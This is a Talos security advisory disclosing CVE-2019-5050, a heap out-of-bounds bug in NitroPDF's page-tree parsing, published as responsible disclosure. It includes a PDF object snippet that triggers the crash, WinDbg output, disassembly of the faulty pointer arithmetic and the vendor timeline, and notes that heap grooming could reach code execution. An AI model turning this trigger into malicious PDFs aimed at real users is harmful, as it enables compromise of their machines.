Talos Vulnerability Report

TALOS-2019-0819

NitroPDF Page Kids Remote Code Execution Vulnerability

October 9, 2019
CVE Number

CVE-2019-5050

Summary

A specifically crafted PDF file can lead to a heap corruption when opened in NitroPDF 12.12.1.522. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file.

Tested Versions

NitroPDF 12.12.1.522

Product URLs

https://www.gonitro.com/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-122: Heap Based Buffer Overflow

Details

A potential remote code execution vulnerability exists in the PDF parsing functionality of Nitro Pro. A specially crafted PDF file can tirgger this vulnerability resulting in potential code execution.

While parsing the page tree of the PDF document, a parser confusion can lead to /Page objects being considered as /Pages object. In general, /Pages object contains an array of /Kids objects which can themselves be of type /Pages or /Page. Page object is supposed to define the contents of the page. In NitroPDF, when the /Page object, wrongfully, contains a /Kids array along with /Count value specifying the number of expected kid objects, this /Page object is parsed as a /Pages object. Additionally, if there’s a discrepancy in actual objects being present in the document, the number of objects in /Kids array and the value of /Count, an out of bounds memory access on the heap can be triggered. The following part of the PDF document causes a crash:

2 0 obj
<< 
/Count 1
/Kids [  3 0 R ] 
>> 
endobj

3 0 obj
<< 
/Type /Page
/Count 20
/Kids [ 4 0 R ] 
>> 
endobj

Object 2 0 is a proper /Pages document and points to 3 0 an its /Kids. Object 3 0 in turn declares itself having a type of /Page instead of /Pages but still has both /Kids and /Count. Parsing this in NitroPDF results in the following crash:

(3d18.6774): Access violation - code c0000005 (!!! second chance !!!)
npdf!PDDocUpdateTextCache+0x5400:
00007ff9`1dee6890 410f1001        movups  xmm0,xmmword ptr [r9] ds:000001be`3fc211c0=????????????????????????????????
0:000> k 5
 # Child-SP          RetAddr           Call Site
00 00000030`f49fe090 00007ff9`1ded52b4 npdf!PDDocUpdateTextCache+0x5400
01 00000030`f49fe0d0 00007ff9`1dedbfba npdf!PDWordFinderReleaseWordList+0x10d44
02 00000030`f49fe210 00007ff9`1deeadee npdf!PDDocAcquirePage+0x3a
03 00000030`f49fe260 00007ff9`1dee6de3 npdf!PDDocUpdateTextCache+0x995e
04 00000030`f49fe2a0 00007ff9`1dee0811 npdf!PDDocUpdateTextCache+0x5953

The above crash is due to access to read access to invalid memory pointed by r9. If we take a look at the rest of the crashing basic block we can see:

.text:00000001803C6890 movups  xmm0, xmmword ptr [r9]
.text:00000001803C6894 add     r9, 18h
.text:00000001803C6898 add     rax, 18h
.text:00000001803C689C movups  xmmword ptr [rax-18h], xmm0
.text:00000001803C68A0 movsd   xmm1, qword ptr [r9-8]
.text:00000001803C68A6 movsd   qword ptr [rax-8], xmm1
.text:00000001803C68AB cmp     r9, rcx
.text:00000001803C68AE jnz     short loc_1803C6890

Above code is essentially a for loop that copies contents from memory pointed to by r9 to buffer pointed to by rax. In each loop, the addresses are increased by 0x18. So, we have a case of out of bounds read followed directly by write. The initial out of bounds value in r9 is actually the 4th argument to this function and rax comes, indirectly, from the 3rd. If we step back to the point where this function is called, we can see the following in r9 and r8 (source and destination respectively) registers:

npdf!PDWordFinderReleaseWordList+0x10d3f:
00007ff9`1ded52af e87c150100      call    npdf!PDDocUpdateTextCache+0x53a0 (00007ff9`1dee6830)
0:000> ?r8
Evaluate expression: 1863222632440 = 000001b1`d0b91ff8
0:000> ?r9
Evaluate expression: 1863222632896 = 000001b1`d0b921c0
0:000> dd r9
000001b1`d0b921c0  ???????? ???????? ???????? ????????
000001b1`d0b921d0  ???????? ???????? ???????? ????????
000001b1`d0b921e0  ???????? ???????? ???????? ????????
000001b1`d0b921f0  ???????? ???????? ???????? ????????
000001b1`d0b92200  ???????? ???????? ???????? ????????
000001b1`d0b92210  ???????? ???????? ???????? ????????
000001b1`d0b92220  ???????? ???????? ???????? ????????
000001b1`d0b92230  ???????? ???????? ???????? ????????

So, when the function is called for the first time, the register r9 already points out of bounds to invalid memory. The code just prior to this function call actually calculates the offset which causes an out of bounds heap access:

00007ff9`1ded5286 488b4628        mov     rax,qword ptr [rsi+28h]
00007ff9`1ded528a 8bcb            mov     ecx,ebx
00007ff9`1ded528c 48ffc1          inc     rcx
00007ff9`1ded528f 488d1449        lea     rdx,[rcx+rcx*2]                   [1]
00007ff9`1ded5293 4c8d0cd0        lea     r9,[rax+rdx*8]                    [2]
00007ff9`1ded5297 8b5c2440        mov     ebx,dword ptr [rsp+40h]
00007ff9`1ded529b 488d0c5b        lea     rcx,[rbx+rbx*2]                   [3]
00007ff9`1ded529f 4c8d04c8        lea     r8,[rax+rcx*8]                    [4]
00007ff9`1ded52a3 488d942488000000 lea     rdx,[rsp+88h]
00007ff9`1ded52ab 488d4e28        lea     rcx,[rsi+28h]
00007ff9`1ded52af e87c150100      call    npdf!PDDocUpdateTextCache+0x53a0 (00007ff9`1dee6830)

At [1] above, the index into the array is calculated into rdx. The value in rcx comes directly from the /Count value in the object. Then at [2], the offset into the memory array is calculated, and r9 points to its final value. Similarly at [3] and [4], the destination pointer is calculated, only the value in ebx actually represents the number of valid /Page objects found so far.

It should be noted that this parser confusion can be nested any number of levels into the page tree which has influence on memory layout and pointer arithmetic. By manipulating this layout, the valid /Page and other objects in the PDF document, this bug can result in arbitrary out of bounds memory access. By carefully controlling the memory contents adjacent the overflown chunk, this overflow can potentially be abused to overwrite adjacent heap memory which can ultimately lead to arbitrary code execution.

Timeline

2019-05-07 - Vendor disclosure
2019-07-02 - 60 day follow up
2019-07-29 - 2nd follow up (90 days approaching notice)
2019-08-06 - 3rd follow up
2019-08-07 - Vendor acknowledged & advised prior emails went to spam folder; Talos issued copy of report
2019-09-03 - Talos granted disclosure extension to 2019-09-10
2019-09-05 - Vendor advised issues will be addressed in a future release (timeline unknown)
2019-10-09 - Public Disclosure

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.